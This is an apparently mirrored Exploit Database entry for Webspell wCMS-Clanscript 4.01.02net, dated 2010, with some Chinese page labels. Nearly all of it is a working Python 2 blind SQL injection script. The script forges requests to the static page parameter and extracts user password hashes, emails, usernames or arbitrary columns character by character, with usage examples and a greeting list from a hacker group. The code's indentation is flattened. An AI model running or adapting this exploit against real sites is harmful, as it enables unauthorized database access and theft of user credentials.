Webspell wCMS-Clanscript4.01.02net – static Blind SQL Injection

• Exploit Database
• 15 阅读

• 作者： Easy Laster
  日期： 2010-09-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15152/

• #----------------------------Information------------------------------------------------
  #+Autor : Easy Laster
  #+ICQ : 11-051-551
  #+Date : 29.09.2010
  #+Script: Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Exploit
  #+Price : $00,00
  #+Language :PHP
  #+Discovered by Easy Laster
  #+code by Dr.ChAoS
  #+Security Group Undergroundagents,Free-hack and 4004-Security-Project
  #+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
  #Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
  #N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
  #and all member from free-hack.com.
  #---------------------------------------------------------------------------------------
  #!/usr/bin/env python
  #-*- coding:utf-8 -*-
  import sys, urllib2, getopt
  
  def out(str):
  sys.stdout.write(str)
  sys.stdout.flush()
  
  def read_url(url):
  while True:
  try:
  src = urllib2.urlopen(url).read()
  break
  except:
  pass
  return src
   
  class Exploit:
  charset = "0123456789abcdefABCDEF"
  url = ""
  charn = 1
  id = 1
  table_prefix = "webs_"
  table_field = ""
  passwd = ""
  columns = []
  find_passwd = True
   
  def __init__(self):
  if len(sys.argv) < 2:
  print "*****************************************************************************"
  print "*Webspell wCMS-Clanscript4.01.02net static&static Blind SQL Injection Exploit*"
  print "*****************************************************************************"
  print "*Discovered and vulnerability by Easy Laster*"
  print "* coded by Dr.ChAoS *"
  print "*****************************************************************************"
  print "* Usage:*"
  print "* python exploit.py [OPTION...] [SWITCH...] <url> *"
  print "* *"
  print "* Example:*"
  print "* *"
  print "* Get the password of the user with id 2: *"
  print "* python exploit.py --id 2 http://site.de/path/ *"
  print "* *"
  print "* Get email, username and password of id 1: *"
  print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/*"
  print "* *"
  print "* Switches: *"
  print "* --nopwSearch no password*"
  print "* *"
  print "* Options:*"
  print "* --id <user id>User id *"
  print "* --prefix <table prefix> Table prefix of ECP *"
  print "* --charn <1 - 32, default = 1> Start at position x *"
  print "* --columns <max_chars:charn:column,...>Get value of any column you want*"
  print "*****************************************************************************"
  exit()
  opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
  for opt in opts:
  if opt[0] == "--id":
  self.id = int(opt[1])
  elif opt[0] == "--prefix":
  self.table_prefix = opt[1]
  elif opt[0] == "--charn":
  self.charn = int(opt[1])
  elif opt[0] == "--columns":
  for col in opt[1].split(","):
  max, charx, name = col.split(":")
  self.columns.append([int(max), int(charx), name, ""])
  elif opt[0] == "--nopw":
  self.find_passwd = False
  for switch in switches:
  if switch[:4] == "http":
  if switch[-1:] == "/":
  self.url = switch
  else:
  self.url = switch + "/"
  def valid_page(self, src):
  if "http://www.wookie.de/images/baustelle.gif" not in src:
  return True
  else:
  return False
  def generate_url(self, ascii):
  return self.url + "index.php?site=static&staticID=1%27+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "user+WHERE+userid=" + str(self.id) + ")," + str(self.charn) + ",1))%3E" + str(ord(ascii)) + "--+"
  def start(self):
  print "Exploiting..."
  if self.find_passwd:
  charx = self.charn
  self.password()
  if len(self.columns) > 0:
  self.read_columns()
  print "All finished!\n"
  print "------ Results ------"
  if len(self.columns) > 0:
  for v in self.columns:
  print "Column \"" + v[2] + "\": " + v[3]
  if self.find_passwd:
  if len(self.passwd) == 32 - charx + 1:
  print "Password: " + self.passwd
  else:
  print "Password not found!"
  print "---------------------"
  def read_columns(self):
  end = False
  charrange = [0]
  charrange.extend(range(32, 256))
  for i in range(len(self.columns)):
  out("Getting value of \"" + self.columns[i][2] + "\": ")
  self.table_field = self.columns[i][2]
  self.charn = self.columns[i][1]
  for pwc in range(self.charn, self.columns[i][0] + 1):
  if end == True:
  break
  self.charn = pwc
  end = False
  for c in charrange:
  src = read_url(self.generate_url(chr(c)))
  if self.valid_page(src):
  if c == 0:
  end = True
  else:
  self.columns[i][3] += chr(c)
  out(chr(c))
  break
  out("\n")
  def password(self):
  out("Getting password: ")
  self.table_field = "password"
  for pwc in range(self.charn, 33):
  self.charn = pwc
  for c in self.charset:
  src = read_url(self.generate_url(c))
  if self.valid_page(src):
  self.passwd += c
  out(c)
  break
  out("\n")
  
  exploit = Exploit()
  exploit.start()